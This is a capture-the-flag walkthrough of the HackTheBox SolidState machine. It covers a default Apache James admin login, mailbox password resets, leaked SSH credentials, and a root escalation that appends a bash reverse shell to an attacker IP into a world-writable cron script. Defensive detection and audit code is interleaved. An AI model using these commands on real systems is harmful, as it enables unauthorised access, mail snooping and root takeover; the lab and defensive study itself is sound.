SolidState Walkthrough HacktheBox

Kapil Verma
4 min read · Aug 8, 2023

Step 1:

Nmap scan:

Port 4555 caught my eye first:

https://redthunder.blog/2016/11/25/install-and-configure-the-apache-james-mail-server/

Got a public exploit immediately.

Ran the exploit:

It says we will get a shell once someone logs in, so I am waiting for now. Let's see; maybe the machine is designed so that someone logs in after some time, giving us a shell.

Meanwhile waiting for the shell, let’s enumerate the web application:

From directory brute force we got some files:

Got something in the README.txt

Well, nothing much.

Enumerating Port 25 SMTP:

nmap --script "smtp*" -p 25 10.10.10.51 -Pn

We do SMTP user enumeration using the tool below:

smtp-user-enum:

smtp-user-enum -M VRFY -U /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt -t 10.10.10.51

ismtp -h 10.10.10.51:25 -e email.txt   # for this we need an email list for the mail spoofing test
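From the defender's side, the VRFY-based enumeration above is noisy: one client walks a wordlist and the server answers differently for known and unknown users. The following added example (not from the original post, and not Apache James's real log format) parses constructed MTA log lines and flags any client that issues a burst of VRFY commands inside a sliding window, separating "user exists" answers (250/252) from "unknown user" answers (5xx) so an analyst can see what the scan learned. The log format, field names and sample IPs are all constructed for the demo.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines for a hypothetical MTA that records every
# SMTP command with the client address and the response code it returned.
SAMPLE_LOG = """\
2023-08-08T10:00:01 client=10.10.14.14 cmd=VRFY arg=root result=252
2023-08-08T10:00:01 client=10.10.14.14 cmd=VRFY arg=admin result=550
2023-08-08T10:00:02 client=10.10.14.14 cmd=VRFY arg=john result=252
2023-08-08T10:00:02 client=10.10.14.14 cmd=VRFY arg=mindy result=252
2023-08-08T10:00:03 client=10.10.14.14 cmd=VRFY arg=test result=550
2023-08-08T10:00:03 client=10.10.14.14 cmd=VRFY arg=guest result=550
2023-08-08T10:00:04 client=10.10.14.14 cmd=VRFY arg=info result=550
2023-08-08T10:00:05 client=10.10.14.14 cmd=VRFY arg=mail result=550
2023-08-08T10:00:09 client=10.10.14.14 cmd=VRFY arg=ftp result=550
2023-08-08T10:00:10 client=10.10.14.14 cmd=VRFY arg=www result=550
2023-08-08T10:00:11 client=10.10.14.14 cmd=VRFY arg=backup result=550
2023-08-08T10:05:00 client=192.168.1.20 cmd=VRFY arg=alice result=252
2023-08-08T10:05:30 client=192.168.1.20 cmd=MAIL arg=FROM:<alice@example.test> result=250
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) client=(?P<client>\S+) cmd=(?P<cmd>\S+) "
    r"arg=(?P<arg>\S+) result=(?P<code>\d+)$"
)


def parse_log(text):
    """Parse the constructed log format into a list of event dicts; skip malformed lines."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        events.append({
            "ts": datetime.fromisoformat(m["ts"]),
            "client": m["client"],
            "cmd": m["cmd"].upper(),
            "arg": m["arg"],
            "code": int(m["code"]),
        })
    return events


def detect_vrfy_enumeration(events, threshold=5, window=timedelta(seconds=60)):
    """Flag clients that send >= `threshold` VRFY commands within any `window`.

    Returns {client: {"vrfy", "valid", "unknown", "window_hits"}} for alerting clients.
    `valid` counts 250/252 replies (server confirmed or accepted the address);
    `unknown` counts 5xx replies (server rejected it). A large `unknown` with a few
    `valid` is the signature of a wordlist walk rather than a misconfigured MUA.
    """
    per_client = defaultdict(list)
    for e in events:
        if e["cmd"] == "VRFY":
            per_client[e["client"]].append(e)

    alerts = {}
    for client, evs in per_client.items():
        evs.sort(key=lambda e: e["ts"])
        # Two-pointer sliding window over the sorted timestamps.
        max_hits, start = 0, 0
        for end in range(len(evs)):
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            max_hits = max(max_hits, end - start + 1)
        if max_hits >= threshold:
            alerts[client] = {
                "vrfy": len(evs),
                "valid": sum(1 for e in evs if e["code"] in (250, 252)),
                "unknown": sum(1 for e in evs if e["code"] >= 500),
                "window_hits": max_hits,
            }
    return alerts


if __name__ == "__main__":
    for client, info in detect_vrfy_enumeration(parse_log(SAMPLE_LOG)).items():
        print(f"{client}: {info['vrfy']} VRFY in total, {info['window_hits']} inside the window, "
              f"{info['valid']} confirmed, {info['unknown']} rejected")
```

The mitigation that makes this detector unnecessary is simpler still: disable VRFY (and EXPN) on an Internet-facing MTA, or have it return the same non-committal 252 for every address so the reply code leaks nothing about which mailboxes exist.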

I couldn't get much from port 25, so I went back to port 4555.

Trying to connect to port 4555 on 10.10.10.51 using nc

Since the first exploit against the James Remote Administration tool already showed that root:root works, let's use it.

Listing users:

Since there is a command to set a password and we know all the usernames, let's reset the passwords.

Reset all the passwords to test@123

Then I started reading all the mails for each user; the commands can be looked up online:

CTRL+ and then enter quit to close the connection.

This suggests that james is asking john to restrict mindy's access and then send her a temporary password to log in to her account.

Maybe this is the way to get into mindy's account; let's see what is there.

Anyway, we still have 2 more users to log in as and read their mails:

So Mindy had 2 mails, 1st one goes like below:

Credentials:

mindy:P@55W0rd1!2@

Although we got credentials, I still want to see what mails the mailadmin user had.

ssh mindy@10.10.10.51

P@55W0rd1!2@

Also, from the Apache James Server 2.3.2 exploit we knew it required somebody to log in via SSH.

Let’s run that exploit again.

and set up a listener on port 443; maybe we will retry logging in via SSH to mindy's account.

We got some sort of shell, let’s enumerate the user.

We got a world writable python script in the /opt directory.

Given that file, I want to see if it's being run, so I'll upload pspy. I'll start a Python web server in my pspy directory and then grab the file with wget (grabbing the 32-bit version since this machine is 32-bit):

Running pspy on the remote host, we saw that /opt/tmp.py is run every 3 minutes.

root is running this file.

Since this is a writable file, let's insert a bash reverse shell into the Python script:

echo "os.system('bash -c \"bash -i >& /dev/tcp/10.10.14.14/4444 0>&1\"')" >> tmp.py

The above command appends our reverse shell to the script; then we set up a netcat listener on port 4444 to catch the incoming connection.
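The root cause of the privilege escalation is a script that root runs on a schedule but that any user can modify. The following added check (example code, not from the box or the original post) parses system-crontab lines, locates the script paths each command references, and reports why a privileged scheduler should refuse to run them: world- or group-writable file, wrong owner, or a world-writable parent directory without the sticky bit (which lets anyone replace the file outright). The crontab text and the two scripts are constructed in a temporary directory, and `expected_uid` is a parameter (default 0 for root) so the demo runs as an unprivileged user.

```python
import os
import stat
import tempfile


def insecure_script_findings(path, expected_uid=0):
    """Return a list of reasons `path` is unsafe to run from a privileged cron job."""
    findings = []
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return ["missing file"]
    if st.st_mode & stat.S_IWOTH:
        findings.append("world-writable file")
    if st.st_mode & stat.S_IWGRP:
        findings.append("group-writable file")
    if st.st_uid != expected_uid:
        findings.append(f"owned by uid {st.st_uid}, expected {expected_uid}")
    parent = os.path.dirname(os.path.abspath(path))
    pst = os.stat(parent)
    # Writable parent without the sticky bit: the script can be deleted and replaced.
    if pst.st_mode & stat.S_IWOTH and not pst.st_mode & stat.S_ISVTX:
        findings.append("world-writable parent directory without sticky bit")
    return findings


def audit_crontab(crontab_text, expected_uid=0):
    """Audit system-crontab lines (5 time fields, user, command).

    Every absolute path in the command that names an existing regular file is
    checked; the result maps path -> findings for paths that have any.
    """
    report = {}
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment, or VAR=value environment line
        fields = line.split()
        if len(fields) < 7:
            continue  # not a "min hour dom mon dow user command" entry
        for token in fields[6:]:
            if token.startswith("/") and os.path.isfile(token):
                findings = insecure_script_findings(token, expected_uid)
                if findings:
                    report[token] = findings
    return report


def build_demo():
    """Construct a temp dir with one hardened script and one world-writable script."""
    d = tempfile.mkdtemp()
    safe = os.path.join(d, "safe.py")
    weak = os.path.join(d, "tmp.py")
    for p in (safe, weak):
        with open(p, "w") as f:
            f.write("#!/usr/bin/env python3\nprint('scheduled task')\n")
    os.chmod(safe, 0o755)
    os.chmod(weak, 0o777)  # the SolidState mistake: anyone can append to a root-run script
    return safe, weak


if __name__ == "__main__":
    safe, weak = build_demo()
    # Constructed crontab: mirrors the every-3-minutes job seen with pspy.
    tab = f"*/3 * * * * root python3 {weak}\n0 * * * * root python3 {safe}\n"
    for path, why in audit_crontab(tab, expected_uid=os.getuid()).items():
        print(path, "->", ", ".join(why))
```

Run periodically (or from a configuration-management check), this catches the `chmod 777` class of mistake before pspy does; the fix on the host is `chown root:root` plus `chmod 755` on the script and its directory.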
